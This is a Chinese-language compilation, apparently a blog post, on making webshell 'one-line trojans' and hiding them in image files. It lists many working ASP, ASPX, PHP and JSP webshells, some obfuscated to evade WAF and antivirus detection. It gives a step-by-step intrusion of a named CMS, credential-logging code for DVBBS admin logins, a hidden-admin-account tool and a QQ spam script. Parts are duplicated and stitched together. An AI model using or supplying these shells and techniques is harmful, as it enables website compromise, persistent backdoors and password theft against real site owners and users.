一句话木马图片制作(三种方法)

攻防世界上传⼀句话⽊马这道题⾸先是检查出上传图⽚之后回响⼗分快，所以的话有理由相信这就是js前端过滤之后查看源代码发现的确是在前端就进⾏了过滤，只允许上传 jpg png。

下⾯是常识好吧。

前端过滤的常见⽅法：：1、filter()：数组的过滤器⽅法2、Object.keys()：es6提供的⽅法，⽤来获取对象键值对的键的集合3、every()：数组的every⽅法，因为检查数组内的所有元素是否都满⾜某⼀条件，如果都满⾜返回true,.如果有⼀项元素不满⾜就返回false。

4、includes():es7中提供的新⽅法，⽤于检测某字符串中是否包含给定的值，如果有返回true，没有返回false,数组中也有该⽅法//假设后端通过接⼝给我们的数据如下：下⾯是⼀个例⼦let data = [ {name: 'Andy',age: 13}, {name: 'Jack',age: 14}, {name: 'Lucy',age: 12} ]//在实际项⽬中，我们需要根据筛选框中的条件来实现数据的过滤,下⾯为过滤⽅法：//@param condition 过滤条件//@param data 需要过滤的数据let filter=(condition,data)=>{return data.filter( item => {return Object.keys( condition ).every( key => {return String( item[ key ] ).toLowerCase().includes(String( condition[ key ] ).trim().toLowerCase() )} )} )}//假设选择的条件为name中带字母a的元素var condition={name:'a'}filter(condition,data) //[ {name: 'Andy',age: 13},{name: 'Jack',age: 14}]//假设选择的条件为name中带字母a，⽽且age为13的元素var condition={name:'a',age:13}filter(condition,data) //[ {name: 'Andy',age: 13}]相当于是函数的使⽤⼀样了吧，，filter() 个⼈感觉是这样的⾸先是上传⼀句话⽊马，<?php @eval($_POST['attack']) ?>审计代码知道只能是上传 png j什么的格式之后就是把写好的⼀句话⽊马改后缀成png然后上传打开代理，使⽤ burpsuit 抓包，，，，这⾥的话⼀定要注意代开burpsuit的开关在上传，不要弄错，不然的话会抓到错误的包正确的包应该是有⽂件名和⽂件类型的⼀定要是这样的才⾏，之后就是把⽂件的后缀改成php这样就可以实现⽂件的绕过算了我现在还不知道为什么要这样做，，，，，，不过就是跟着做⽽已下⾯是参考的两篇博客：：：：这是我参考做出来的博客链接，，，，做的时候有两个要点：：：；⾸先是在burpsuit⾥⾯会返回⼀个⽂件，，，之后使⽤中国蚁剑连接的是返回加上那个⽂件的url，，不是之前原来的⽹页的url第⼆点是使⽤中国蚁剑的时候不能连校园⽹，这样的话打开不了⽂件管理，有时侯还连不上，保存之后就是直接接右键⽂件管理（添加成功之后），或者是直接双击打开，，，，，就是这样了。

⼀句话⽊马：ASPX篇aspx⽊马收集：<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>随⽇期变化的连接密码, 服务端写法：<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format(" {0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>例如：菜⼑的密码为chopper，在前⾯加三个字符,新密码为：{D}chopper<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%><script runat="server" language="JScript">function popup(str) {var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}</script><%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>密码 z<%@ Page Language="Jscript" validateRequest="false" %><%var kengkeng = Request.Item["never"];Response.Write(eval(keng,"unsafe"));%><%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>密码 -7<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>密码 abcd<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>过狗过D盾⼀句话<%@ Page Language="Jscript" Debug=true%><%vara=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0=")); var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));var c=eval(a,b);eval(c,b);%><%@ Page Language="Jscript" Debug=true%><%var a=Request.Form["pass"];var b="unsa",c="fe",d=b+c;function fun(){return a;}eval(fun(),d);%>。

各种⼀句话⽊马⼤全<%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request("sb")%>%><%Eval(Request(chr(35)))%><%<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%><%eval(Request.Item["c"],"unsafe");%>'备份专⽤<%eval(request("c")):response.end%>'⽆防下载表,有防下载表突破专⽤⼀句话<%execute request("c")%><%<%loop<%:%><%<%loop<%:%><%execute request("c")%><%execute request("c")<%loop<%:%>'防杀防扫专⽤<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>'不⽤"<,>"<script language=VBScript runat=server>execute request("c")</script><% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我⼀声⽼⼤'};lcx.性别((lcx.名字)+'') %><script language=vbs runat=server>eval(request("c"))</script><script language=vbs runat=server>eval_r(request("c"))</script>'不⽤双引号<%eval request(chr(35))%>'可以躲过雷客图<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") nguage="VBScript" ms.AddObject"response",response ms.AddObject"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%><%dy=request("dy")%><%Eval(dy)%>'容错代码if Request("sb")<>"" then ExecuteGlobal request("sb") end ifPHP⼀句话复制代码代码如下:<?php eval($_POST1);?><?php if(isset($_POST['c'])){eval($_POST['c']);}?><?php system($_REQUEST1);?><?php ($_=@$_GET1).@$_($_POST1)?><?php eval_r($_POST1)?><?php @eval_r($_POST1)?>//容错代码<?php assert($_POST1);?>//使⽤Lanker⼀句话客户端的专家模式执⾏相关的PHP语句<?$_POST['c']($_POST['cc']);?><?$_POST['c']($_POST['cc'],$_POST['cc'])?><?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使⽤这个后,使⽤菜⼑⼀句话客户端在配置连接的时候在"配置"⼀栏输⼊*/:<O>h=@eval_r($_POST1);</O><?php echo `$_GET['r']` ?>//绕过<?限制的⼀句话<script language="php">@eval_r($_POST[sb])</script>JSP⼀句话复制代码代码如下:<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>提交客户端<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>ASPX⼀句话<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>再补充⼏个：推荐还是把⼀句话加进图⽚⾥⾯去。

⼀句话⽊马使⽤演⽰（转载）实例⼀：“⼀句话⽊马”⼊侵“EASYNEWS新闻管理系统”“EASYNEWS新闻管理系统 v1.01 正式版”是在企业⽹站中⾮常常见的⼀套整站模版，在该⽹站系统的留⾔本组件中就存在着数据过滤不严漏洞，如果⽹站是默认路径和默认⽂件名安装的话，⼊侵者可以利⽤该漏洞直接上传ASP⽊马程序控制整个⽹站服务器。

Step1 搜索⼊侵⽬标使⽤了“EASYNEWS新闻管理系统 v1.01 正式版”的⽹站，在⽹站页⾯的底部版权声明处，往往会有关键字符为“ 版权所有”。

只要在GOOGLE或百度中以该字符串为关键词进⾏搜索，就可以找到⼤量的⼊侵⽬标。

Step2 检测⼊侵条件在这⾥，我们以⽹站“/news/index.htm”为例进⾏⼀次⼊侵检测。

“EASYNEWS新闻管理系统”⽹站的留⾔本数据库⽂件默认是位于“\ebook\db\ebook.asp”，⾸先在浏览器地址栏中输⼊“/news/ebook/db/ebook.asp”，回车后在浏览器页⾯中将显⽰访问留⾔本数据库⽂件的返回信息。

如果在页⾯中显⽰乱码，则说明该⽹站的留⾔本数据库⽂件没有改名，可以进⾏⼊侵。

Step3 在数据库中插⼊ASP后门前⾯提到了该新闻系统的留⾔本插件存在过滤不严，因此我们可以通过提交发⾔，在数据库中插⼊“⼀句话⽊马”服务端代码：在浏览器中访问“/news/khly.htm”，打开提交留⾔页⾯。

在提交页⾯中的“主页”栏中，直接填写“⼀句话⽊马”服务端代码，其它随便填写。

确定后点击“发表留⾔”按钮，⽂章发表成功后，即可将“⼀句话⽊马”服务端代码插⼊到留⾔本数据库中了。

Step4 连接后门上传Webshell由于留⾔本数据库⽂件“ebook.asp”是⼀个ASP⽂件，所以我们插⼊到数据库⽂件中的ASP语句将会被执⾏。

将“⼀句话⽊马”客户端中的提交地址改为留⾔本数据库⽂件地址，然后⽤浏览器打开客户端，在上⽅的输⼊框中输⼊上传ASP⽊马的保存路径，在下⾯的输⼊框中可以粘贴⼊其它的ASP⽊马代码，这⾥选择的是桂林⽼兵⽹站管理助⼿ASP代码。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

1.名称：自己如何动手制作图片形式的ASP木马（还要可显示图片）建一个asp文件，内容为找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索 shell代码插在这里，最好是小马，还要加密一下访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法，在我们要做手脚的asp文件里加入如下内容访问的时候在做手脚的asp文件后面加上?filer=XXX XXX 为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp （3）前提得到system权限，进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的访问http://网站/s…/ating.asp即可 6. 工具/chaojiyonghu.rar，此工具在该电脑生成一个超级用户用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的. 7．名称：QQ群脚本攻击打开qq对话诓，复制消息，然后下面的内容保存为.vbs 文件，运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8．搜索：程序制作：万鹏有免费申请空间的，直接上传asp马即可 9. 名称：全面找出你站上的ASP木马（1）用杀毒软件（2）用FTP客户端软件，点"工具"->"比较文件夹" （3）用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马（4）用工具Beyond Compare 10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样老办法: 修改admin_login.asp得到明文DVBBS后台密码在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台，在目录下就生成了laner.txt （2）login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间，用户名和密码（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 11. 名称：利用QQ在线状态抓鸽子肉鸡生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句: response.write""response.write"" 结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 12. 动画名称：媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏洞: %5c(暴库) 上传注入上传页面:down1/upload.asp 13. 名称：免费电话＋MSH命令行工具 / 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

php⼀句话⽊马变形技巧⽬录⼀、什么是⼀句话⽊马？⼆、我们如何发送命令，发送的命令如何执⾏？0.eval函数1.assert函数2.create_function函数3. call_user_func回调函数4.preg_replace函数5. file_put_contents函数6.array数组7.PHP变量函数三、如何让⼀句话⽊马绕过waf ?1.PHP可变变量2.str_replace函数3. base64_decode函数4."."操作符5.parse_str函数6.更换数据来源7.字符替换或特殊编码8.⽊马藏匿四、总结五、防御⼀、什么是⼀句话⽊马？⼀句话⽊马就是只需要⼀⾏代码的⽊马，短短⼀⾏代码，就能做到和⼤马相当的功能。

为了绕过waf的检测，⼀句话⽊马出现了⽆数中变形，但本质是不变的：⽊马的函数执⾏了我们发送的命令。

⼆、我们如何发送命令，发送的命令如何执⾏？我们可以通过 GET、POST、COOKIE这三种⽅式向⼀个⽹站提交数据，⼀句话⽊马⽤$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据，并把接收的数据传递给⼀句话⽊马中执⾏命令的函数，进⽽执⾏命令。

所以看到的经典⼀句话⽊马⼤多都是只有两个部分，⼀个是可以执⾏代码的函数部分，⼀个是接收数据的部分。

0.eval函数<?php eval($_POST['a']) ?>其中eval就是执⾏命令的函数，**$_POST[‘a']**就是接收的数据。

eval函数把接收的数据当作PHP代码来执⾏。

这样我们就能够让插⼊了⼀句话⽊马的⽹站执⾏我们传递过去的任意PHP语句。

这便是⼀句话⽊马的强⼤之处。

因为⽊马是接收post请求中 “a” 的数据（ $_POST[‘a']）,所以我们必须以post⽅法发送数据并且将我们要执⾏的代码赋值给“a”。